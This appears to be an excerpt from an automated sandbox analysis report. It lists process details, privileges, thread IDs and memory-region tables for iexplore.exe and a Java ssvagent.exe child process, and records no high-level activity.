Information Value
ID #18
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2024 CREDAT:14337
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:47, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:37
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xbcc
Parent PID 0x7e8 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B6C
0x B7C
0x B78
0x B74
0x B64
0x B68
0x B94
0x B70
0x B60
0x 224
0x 500
0x 32C
0x 4AC
0x 614
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x002eefff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f0fff Pagefile Backed Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00300000 0x0031efff Memory Mapped File Readable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x00331fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x004adfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000004b0000 0x004b0000 0x004b1fff Pagefile Backed Memory Readable True False False -
index.dat 0x004c0000 0x004cffff Memory Mapped File Readable, Writable True False False -
index.dat 0x004d0000 0x004d7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x004e0000 0x004effff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000004f0000 0x004f0000 0x004f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000500000 0x00500000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000570000 0x00570000 0x00571fff Private Memory Readable, Writable True False False -
private_0x0000000000580000 0x00580000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000660000 0x00660000 0x0069ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x008bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000008c0000 0x008c0000 0x00a47fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a50000 0x00a50000 0x00bd0fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x00be0000 0x00eaefff Memory Mapped File Readable False False False -
private_0x0000000000f20000 0x00f20000 0x00f5ffff Private Memory Readable, Writable True False False -
private_0x0000000000f60000 0x00f60000 0x0105ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x010c0000 0x01165fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001170000 0x01170000 0x0256ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002590000 0x02590000 0x025cffff Private Memory Readable, Writable True False False -
private_0x0000000002600000 0x02600000 0x026fffff Private Memory Readable, Writable True False False -
private_0x0000000002750000 0x02750000 0x0278ffff Private Memory Readable, Writable True False False -
private_0x0000000002790000 0x02790000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x02a2ffff Private Memory Readable, Writable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02bdffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02e7ffff Private Memory Readable, Writable True False False -
private_0x0000000002f90000 0x02f90000 0x02fcffff Private Memory Readable, Writable True False False -
private_0x0000000003060000 0x03060000 0x0315ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003160000 0x03160000 0x03552fff Pagefile Backed Memory Readable True False False -
private_0x00000000035b0000 0x035b0000 0x036affff Private Memory Readable, Writable True False False -
private_0x0000000003760000 0x03760000 0x0385ffff Private Memory Readable, Writable True False False -
private_0x0000000003990000 0x03990000 0x0399ffff Private Memory Readable, Writable True False False -
private_0x0000000003a50000 0x03a50000 0x03a8ffff Private Memory Readable, Writable True False False -
staticcache.dat 0x03a90000 0x043bffff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x73110000 0x73b8ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x74390000 0x7441dfff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74650000 0x746d3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x746e0000 0x74782fff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x74a00000 0x74a2afff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x74ba0000 0x74c94fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75520000 0x7556bfff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x75790000 0x757a0fff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x757a0000 0x757d2fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x757b0000 0x757ddfff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x757e0000 0x75814fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75c00000 0x75c26fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75c30000 0x75dccfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x767f0000 0x7686afff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x76870000 0x76881fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in flog.txt.
Process #20: ssvagent.exe
0 0
Information Value
ID #20
File Name c:\progra~2\java\jre7\bin\ssvagent.exe
Command Line "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:48, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:36
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x394
Parent PID 0xbcc (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 748
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x0041ffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
private_0x0000000000a20000 0x00a20000 0x00a5ffff Private Memory Readable, Writable True False False -
private_0x0000000000ae0000 0x00ae0000 0x00aeffff Private Memory Readable, Writable True False False -
ssvagent.exe 0x00c90000 0x00c9cfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x0209ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x020a0000 0x0236efff Memory Mapped File Readable False False False -
deploy.dll 0x71d30000 0x71d8afff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x71df0000 0x71eaefff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x74b70000 0x74b9dfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -